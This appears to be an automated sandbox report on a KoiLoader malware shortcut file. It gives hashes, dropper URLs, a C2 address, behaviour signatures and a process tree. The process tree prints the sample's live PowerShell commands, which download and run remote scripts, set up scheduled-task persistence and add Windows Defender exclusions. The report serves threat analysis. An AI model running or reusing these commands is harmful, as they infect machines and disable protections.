Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

22_11_2024_stmnt.lnk

windows7-x64

10

22_11_2024_stmnt.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/12/2024, 11:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    22_11_2024_stmnt.lnk

  • Size

    3KB

  • MD5

    34ee898cb6c5ae305685129bd0b02ceb

  • SHA1

    72c04950fa82ea474c945f31dc3e7a32635689ae

  • SHA256

    215ff81b6f3a50e48d9f5acfb89f5ea3a1afd59dddbb0666f7ce97a922f60326

  • SHA512

    7bf440741559ffffda909092e32329635eed5a5afd31316f58a4080f8855c57d9399f4b25d6535a490e5c28727586209e3ff7c44c4d2e947c837ab58272b976d

Score
10/10
koiloaderdefense_evasiondiscoveryexecutionloader

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1

Extracted

Family

koiloader

C2

http://195.123.217.43/oversate.php

Attributes
  • payload_url

    https://www.italialife24.it/wp-content/uploads/2021/05

Signatures

  • KoiLoader

    KoiLoader is a malware loader written in C++.

    loaderkoiloader
  • Koiloader family
    koiloader
  • Detects KoiLoader payload 2 IoCs
    loader
  • Blocklisted process makes network request 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Indicator Removal: Clear Persistence 1 TTPs 2 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

    defense_evasion
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\22_11_2024_stmnt.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4564
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5008
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\Admin\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js " /tn 48dYPKZW1
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:752
  • C:\Windows\system32\wscript.EXE
    C:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2212
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\GMYBQC3ETS4T.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\GMYBQC3ETS4T.js "
      2⤵
      • Blocklisted process makes network request
      • Indicator Removal: Clear Persistence
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3212
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /delete /tn 7Jb5KYoTpe8IWE.js /f
        3⤵
          PID:2272
        • C:\Windows\system32\wscript.exe
          "C:\Windows\system32\wscript.exe" C:\ProgramData\GMYBQC3ETS4T.js
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2208
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7z3W4R39YWJZ'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4380
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3320
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1728
    • C:\Windows\SysWOW64\DllHost.exe
      C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2196
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4844
    • C:\Windows\system32\wscript.EXE
      C:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2600
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\GMYBQC3ETS4T.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\GMYBQC3ETS4T.js "
        2⤵
        • Blocklisted process makes network request
        • Indicator Removal: Clear Persistence
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5052
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /delete /tn 7Jb5KYoTpe8IWE.js /f
          3⤵
            PID:4388
          • C:\Windows\system32\wscript.exe
            "C:\Windows\system32\wscript.exe" C:\ProgramData\GMYBQC3ETS4T.js
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:2208
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zJK93S0GXUB'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4792
      • C:\Windows\System32\wscript.exe
        C:\Windows\System32\wscript.exe "C:\ProgramData\r896de533-e5fb-4eb9-8f2b-d363f3584dc5r.js"
        1⤵
          PID:4772

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\GMYBQC3ETS4T.js
          Filesize

          1KB

          MD5

          95047081f54c2e44a36842e58425e0a2

          SHA1

          31857fe72f60e8fa84bc062cf342b0507b7d1a43

          SHA256

          fcb887eeeb71139200011370565463661309b1cf132625b6e5ff1e68859f8ea7

          SHA512

          fbf23210394f7e0beb8c70547e2fa4f8bd78561e3a3bdfc49058901a50edc8799dd3425edff02529bd165c2d8ed204cdfc89a123514959ac4c47691466930506

          Download Submit

        • C:\ProgramData\GMYBQC3ETS4T.js
          Filesize

          1KB

          MD5

          6f873aa31f54e7699a74a202952ae0cc

          SHA1

          b90a05819534e0863888fd20b82bbd58833d19ce

          SHA256

          597acaf425cd0bbf416745fb4cd5e05f860685abf43c7a7f66437b580b6e2df0

          SHA512

          9d29b051e20a896562ad8c2ecd85c2b634f16b4bdbfc22d23dd4145e727278051ff941fbd075f65cccddefb69ebd31343e01caebfcc6a0fc3fc50a3b95bc2f57

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          2f57fde6b33e89a63cf0dfdd6e60a351

          SHA1

          445bf1b07223a04f8a159581a3d37d630273010f

          SHA256

          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

          SHA512

          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          968cb9309758126772781b83adb8a28f

          SHA1

          8da30e71accf186b2ba11da1797cf67f8f78b47c

          SHA256

          92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

          SHA512

          4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          Filesize

          53KB

          MD5

          06ad34f9739c5159b4d92d702545bd49

          SHA1

          9152a0d4f153f3f40f7e606be75f81b582ee0c17

          SHA256

          474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

          SHA512

          c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          19KB

          MD5

          22badba319d9a63e682a441d1b59fbea

          SHA1

          fcbba1ef9fff894c116cacb886214647b6b1d9a8

          SHA256

          328d34335445272fd0fc31f28987d53848806a59ec1415f3273943dbf4f76da6

          SHA512

          84f988f442c9a64707338ab39e6c35bada3d5fea7d6ea85a9bebb9703c448f0f9483f3533b07b4513a9f8e79b14449e46fe12a06ed9d731fb75da6a92c5c60f6

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          477031a32089e6d066092d640b526add

          SHA1

          5041602c7c71b4c6e40928039dcc07b6b32a67f2

          SHA256

          0ec3dcb238a28e1b43e2f7b03f955f6304927314c40a51f1d4b2b00345c12bef

          SHA512

          01388ea1af8248901beb17d1fa62efead2ae1bf9accfc8e132f4f0c0e77c068fd7e998d218043fdc90c497824ca3723689502490da4fd97237a4f0d40ef2bb4e

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          fc28168b916bf9744961653d503e1164

          SHA1

          71deadab13b81a414582f931e9af010152463644

          SHA256

          a2a78e9fb30fe365d454ca6bbbf950355049c978262fdf0e80cd683622cf00e9

          SHA512

          08d828e18ccb2892f12dcbbaf5a5ffcafb4e2e768536fc46b3d2fce788c52b2f61058e1ef0a47e648e2308f4f1aeb8799bef9472726d2800fa9b775f401e08c9

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          a5c074e56305e761d7cbc42993300e1c

          SHA1

          39b2e23ba5c56b4f332b3607df056d8df23555bf

          SHA256

          e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953

          SHA512

          c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\7Jb5KYoTpe8IWE.js
          Filesize

          304B

          MD5

          bb33549bd583a1fa6625bd5ea429795e

          SHA1

          57b2f8650be3d569dd0d907d20310d2ee952fef3

          SHA256

          0ae26f1009379aa380187650771bdbed89de441bc88b6326ea0fcba9d6d7f2e7

          SHA512

          3655e94571ee7ee15af40d5979a51ba3f14b9ea921fb7e137d9358a88a82dad2dd1baaa0742196f989f5f03797e62a024f187b2d879841adcc5823a162f9cd7f

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zndcfs4g.t2e.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • memory/1728-105-0x0000000007D90000-0x0000000007E22000-memory.dmp

          Filesize

          584KB

          Download

        • memory/1728-104-0x0000000007CA0000-0x0000000007CF0000-memory.dmp

          Filesize

          320KB

          Download

        • memory/1728-103-0x0000000007B30000-0x0000000007B4A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/1728-102-0x0000000008200000-0x00000000087A4000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/1728-101-0x0000000007410000-0x0000000007432000-memory.dmp

          Filesize

          136KB

          Download

        • memory/4380-56-0x0000000007D40000-0x0000000007D41000-memory.dmp

          Filesize

          4KB

          Download

        • memory/4380-46-0x0000000005AA0000-0x0000000005B06000-memory.dmp

          Filesize

          408KB

          Download

        • memory/4380-52-0x0000000005FD0000-0x0000000005FEE000-memory.dmp

          Filesize

          120KB

          Download

        • memory/4380-53-0x0000000006030000-0x000000000607C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/4380-54-0x00000000063D0000-0x00000000063EA000-memory.dmp

          Filesize

          104KB

          Download

        • memory/4380-55-0x0000000007650000-0x0000000007CCA000-memory.dmp

          Filesize

          6.5MB

          Download

        • memory/4380-57-0x0000000007DE0000-0x0000000007DED000-memory.dmp

          Filesize

          52KB

          Download

        • memory/4380-50-0x0000000005B10000-0x0000000005E64000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/4380-36-0x00000000029A0000-0x00000000029D6000-memory.dmp

          Filesize

          216KB

          Download

        • memory/4380-37-0x0000000005110000-0x0000000005738000-memory.dmp

          Filesize

          6.2MB

          Download

        • memory/4380-43-0x00000000050E0000-0x0000000005102000-memory.dmp

          Filesize

          136KB

          Download

        • memory/4380-45-0x0000000005A30000-0x0000000005A96000-memory.dmp

          Filesize

          408KB

          Download

        • memory/4792-136-0x0000000007980000-0x000000000798D000-memory.dmp

          Filesize

          52KB

          Download

        • memory/4844-70-0x0000000007480000-0x00000000074B2000-memory.dmp

          Filesize

          200KB

          Download

        • memory/4844-81-0x0000000007460000-0x000000000747E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/4844-95-0x0000000007A30000-0x0000000007A3E000-memory.dmp

          Filesize

          56KB

          Download

        • memory/4844-96-0x0000000007A40000-0x0000000007A54000-memory.dmp

          Filesize

          80KB

          Download

        • memory/4844-97-0x0000000007B40000-0x0000000007B5A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/4844-98-0x0000000007B20000-0x0000000007B28000-memory.dmp

          Filesize

          32KB

          Download

        • memory/4844-84-0x0000000007A80000-0x0000000007B16000-memory.dmp

          Filesize

          600KB

          Download

        • memory/4844-83-0x0000000007870000-0x000000000787A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/4844-82-0x00000000074D0000-0x0000000007573000-memory.dmp

          Filesize

          652KB

          Download

        • memory/4844-85-0x0000000007A00000-0x0000000007A11000-memory.dmp

          Filesize

          68KB

          Download

        • memory/4844-71-0x00000000704B0000-0x00000000704FC000-memory.dmp

          Filesize

          304KB

          Download

        • memory/5008-19-0x00007FF9DEF20000-0x00007FF9DF9E1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/5008-18-0x000001A7B50B0000-0x000001A7B51FE000-memory.dmp

          Filesize

          1.3MB

          Download

        • memory/5008-14-0x00007FF9DEF20000-0x00007FF9DF9E1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/5008-13-0x00007FF9DEF20000-0x00007FF9DF9E1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/5008-3-0x000001A7B4F80000-0x000001A7B4FA2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/5008-2-0x00007FF9DEF23000-0x00007FF9DEF25000-memory.dmp

          Filesize

          8KB

          Download

        • memory/5052-123-0x00000231F4630000-0x00000231F484C000-memory.dmp

          Filesize

          2.1MB

          Download